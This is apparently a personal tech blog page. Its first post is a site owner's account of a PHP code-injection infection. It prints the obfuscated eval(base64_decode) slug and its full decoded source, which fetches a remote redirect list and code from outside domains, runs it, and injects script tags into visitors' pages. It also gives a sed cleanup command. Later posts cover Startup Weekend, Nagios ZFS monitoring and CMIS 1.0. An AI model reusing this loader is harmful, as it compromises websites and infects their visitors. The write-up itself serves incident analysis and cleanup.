Feb
8
2013

Code Injection

I got the first code injection warning from google webmaster. Somebody got in and preceded to prepend every php file with an eval(base64()) block. See below if you are interested in it. If you have a .logs directory on your webserver you might be infected with this.

To remove I ran:

find . -name \*.php -print -exec  sed -i 's/<?php \/\*\*\/ eval(base64_decode("aWYoZnV.*"));?>//' {} \;

PHP Prepended slug:

<?php /**/ eval(base64_decode("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"));?>

which really was a way to hide (thank you http://www.motobit.com/util/base64-decoder-encoder.asp):

if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
    $_SERVER['mr_no'] = 1;
    if (!function_exists('mrobh')) {
        function get_tds_777($url)
        {
            $content = "";
            $content = @trycurl_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfile_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfopen_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfsockopen_777($url);
            if ($content !== false)
                return $content;
            $content = @trysocket_777($url);
            if ($content !== false)
                return $content;
            return '';
        }
        function trycurl_777($url)
        {
            if (function_exists('curl_init') === false)
                return false;
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            $result = curl_exec($ch);
            curl_close($ch);
            if ($result == "")
                return false;
            return $result;
        }
        function tryfile_777($url)
        {
            if (function_exists('file') === false)
                return false;
            $inc = @file($url);
            $buf = @implode('', $inc);
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfopen_777($url)
        {
            if (function_exists('fopen') === false)
                return false;
            $buf = '';
            $f   = @fopen($url, 'r');
            if ($f) {
                while (!feof($f)) {
                    $buf .= fread($f, 10000);
                }
                fclose($f);
            } else
                return false;
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfsockopen_777($url)
        {
            if (function_exists('fsockopen') === false)
                return false;
            $p    = @parse_url($url);
            $host = $p['host'];
            $uri  = $p['path'] . '?' . $p['query'];
            $f    = @fsockopen($host, 80, $errno, $errstr, 30);
            if (!$f)
                return false;
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            fwrite($f, $request);
            $buf = '';
            while (!feof($f)) {
                $buf .= fread($f, 10000);
            }
            fclose($f);
            if ($buf == "")
                return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }
        function trysocket_777($url)
        {
            if (function_exists('socket_create') === false)
                return false;
            $p    = @parse_url($url);
            $host = $p['host'];
            $uri  = $p['path'] . '?' . $p['query'];
            $ip1  = @gethostbyname($host);
            $ip2  = @long2ip(@ip2long($ip1));
            if ($ip1 != $ip2)
                return false;
            $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if (!@socket_connect($sock, $ip1, 80)) {
                @socket_close($sock);
                return false;
            }
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            socket_write($sock, $request);
            $buf = '';
            while ($t = socket_read($sock, 10000)) {
                $buf .= $t;
            }
            @socket_close($sock);
            if ($buf == "")
                return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }
        function update_tds_file_777($tdsfile)
        {
            $actual1 = $_SERVER['s_a1'];
            $actual2 = $_SERVER['s_a2'];
            $val     = get_tds_777($actual1);
            if ($val == "")
                $val = get_tds_777($actual2);
            $f = @fopen($tdsfile, "w");
            if ($f) {
                @fwrite($f, $val);
                @fclose($f);
            }
            if (strstr($val, "|||CODE|||")) {
                list($val, $code) = explode("|||CODE|||", $val);
                eval(base64_decode($code));
            }
            return $val;
        }
        function get_actual_tds_777()
        {
            $defaultdomain = $_SERVER['s_d1'];
            $dir           = $_SERVER['s_p1'];
            $tdsfile       = $dir . "log1.txt";
            if (@file_exists($tdsfile)) {
                $mtime = @filemtime($tdsfile);
                $ctime = time() - $mtime;
                if ($ctime > $_SERVER['s_t1']) {
                    $content = update_tds_file_777($tdsfile);
                } else {
                    $content = @file_get_contents($tdsfile);
                }
            } else {
                $content = update_tds_file_777($tdsfile);
            }
            $tds = @explode("\n", $content);
            $c   = @count($tds) + 0;
            $url = $defaultdomain;
            if ($c > 1) {
                $url = trim($tds[mt_rand(0, $c - 2)]);
            }
            return $url;
        }
        function is_mac_777($ua)
        {
            $mac = 0;
            if (stristr($ua, "mac") || stristr($ua, "safari"))
                if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone")))
                    $mac = 1;
            return $mac;
        }
        function is_msie_777($ua)
        {
            $msie = 0;
            if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
                $msie = 1;
            return $msie;
        }
        function setup_globals_777()
        {
            $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
            $mz = "/tmp/";
            if (!@is_dir($rz)) {
                @mkdir($rz);
                if (@is_dir($rz)) {
                    $mz = $rz;
                } else {
                    $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
                    if (!@is_dir($rz)) {
                        @mkdir($rz);
                        if (@is_dir($rz)) {
                            $mz = $rz;
                        }
                    } else {
                        $mz = $rz;
                    }
                }
            } else {
                $mz = $rz;
            }
            $bot = 0;
            $ua  = $_SERVER['HTTP_USER_AGENT'];
            if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
                $bot = 1;
            if (stristr($ua, "bingbot") || stristr($ua, "google"))
                $bot = 1;
            $msie = 0;
            if (is_msie_777($ua))
                $msie = 1;
            $mac = 0;
            if (is_mac_777($ua))
                $mac = 1;
            if (($msie == 0) && ($mac == 0))
                $bot = 1;
            global $_SERVER;
            $_SERVER['s_p1']     = $mz;
            $_SERVER['s_b1']     = $bot;
            $_SERVER['s_t1']     = 1200;
            // http://ens122zzzddazz.com/
            $_SERVER['s_d1']     = base64_decode('aHR0cDovL2VuczEyMnp6emRkYXp6LmNvbS8=');
            $d                   = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);
            // http://cooperjsutf8.ru/g_load.php
            $_SERVER['s_a1']     = base64_decode('aHR0cDovL2Nvb3BlcmpzdXRmOC5ydS9nX2xvYWQucGhw') . $d;
            // http://nlinthewood.com/g_load.php
            $_SERVER['s_a2']     = base64_decode('aHR0cDovL25saW50aGV3b29kLmNvbS9nX2xvYWQucGhw') . $d;
            $_SERVER['s_script'] = "nl.php?p=d";
        }
        setup_globals_777();
        if (!function_exists('gml_777')) {
            function gml_777()
            {
                $r_string_777 = '';
                if ($_SERVER['s_b1'] == 0)
                    $r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>';
                return $r_string_777;
            }
        }
        if (!function_exists('gzdecodeit')) {
            function gzdecodeit($decode)
            {
                $t     = @ord(@substr($decode, 3, 1));
                $start = 10;
                $v     = 0;
                if ($t & 4) {
                    $str = @unpack('v', substr($decode, 10, 2));
                    $str = $str[1];
                    $start += 2 + $str;
                }
                if ($t & 8) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 16) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 2) {
                    $start += 2;
                }
                $ret = @gzinflate(@substr($decode, $start));
                if ($ret === FALSE) {
                    $ret = $decode;
                }
                return $ret;
            }
        }
        function mrobh($content)
        {
            @Header('Content-Encoding: none');
            $decoded_content = gzdecodeit($content);
            if (preg_match('/\<\/body/si', $decoded_content)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content);
            } else {
                return $decoded_content . gml_777();
            }
        }
        ob_start('mrobh');
    }
}
Nov
1
2012

Chapman Startup Weekend!

Image representing Startup Weekend as depicted...

Image via CrunchBase

 

I am very excited to be a part of Chapman’s Startup weekend.  I will be a mentor on Sunday.  There’s going to some great companies that come out of this!

More information can be found by clicking: http://orangecounty.startupweekend.org/.

Enhanced by Zemanta
Nov
1
2012

Adding ZFS to NagiosGrapher

Like all tech people, I have a box in the garage that I use to run various things.  It’s basically a hobby my wife puts up with.  I have put some media on it and decided to use ZFS to host the files.  I am very impressed with ZFS.  It works quite well with ubuntu.  However, I’m busy and I would like to have something monitor it for me.  So I decided to use nagios and nagiosgrapher.

On ubuntu, please install nagios and nagiosgrapher:

apt-get install nagios nagiosgrapher

I started off with the script from Roy at http://karlsbakk.net/nagios/check_zfs.  I added it to /usr/lib/nagios/plugins and then set the execute permissions

I added to /etc/nagios/commands.cfg:

define command{
command_name check_zfs
command_line sudo $USER1$/check_zfs.pl $ARG1$ $ARG2$
}

In /etc/nagios3/conf.d/localhost_nagios2.cfg, I added:

define service {
use generic-service
host_name localhost
service_description ZFS
check_command check_zfs!vol1!3
}

I then added /etc/nagiosgrapher/ngraph.d/check_zfs.ncfg

# ---
# NagiosGrapher Template for zfs
# ---
#
#

# Size

define ngraph{
service_name zfs
graph_log_regex Size:([0-9.]+)
graph_value size
graph_units Size
graph_legend Size
rrd_plottype LINE
rrd_color 00A348
}

# Used
define ngraph{
service_name zfs
graph_log_regex Used:([0-9.]+)
graph_value used
graph_units Used
graph_legend Used
rrd_plottype LINE
rrd_color CC081F
}
# Avail
define ngraph{
service_name zfs
graph_log_regex Avail:([0-9.]+)
graph_value avail
graph_units Avail
graph_legend Avail
rrd_plottype LINE
rrd_color 07DB18
}

# [EOF]

With the following restarts, nagios now monitors ZFS pool for me on any degradation and graphs the usage over time.  The commands:

/etc/init.d/nagiosgrapher restart
/etc/init.d/nagios3 restart
May
12
2010

CMIS is officially 1.0

It has been a long road to CMIS.  I remember starting this effort with EMC and Microsoft in a conference room in San Francisco.  Over the course of 4 years, we have made amazing progress to get to where we are today.  I’d like to look at numbers since they always tell an interesting story.  Since kicking off CMIS at OASIS we have had:

  • 3 Face to Face meetings (Thank you MSFT, Oracle, and Day)
  • 636 issues (way above the 250ish I thought we would address as a TC; I definitely owe someone a beer)
  • 100 members and 45 companies participating in the TC
  • 3801 emails
  • Countless meetings
  • LinkedIn group with 125 members (invite)

In the end we have over 15 GA and soon to be GA implementations: Adobe CS5, Alfresco, Microsoft SharePoint, EMC, Nuxeo, EntropySoft, Zia iPhone App, ISIS Papyrus, WeWebU among others.  See the list http://wiki.oasis-open.org/cmis/CMIS%201.0%20Products.

I believe we are starting on a great journey that will dramatically change ECM and open up this market.  I don’t think John Newton is irrational.

Other great articles:

I think we are on a great journey and I am looking forward to it.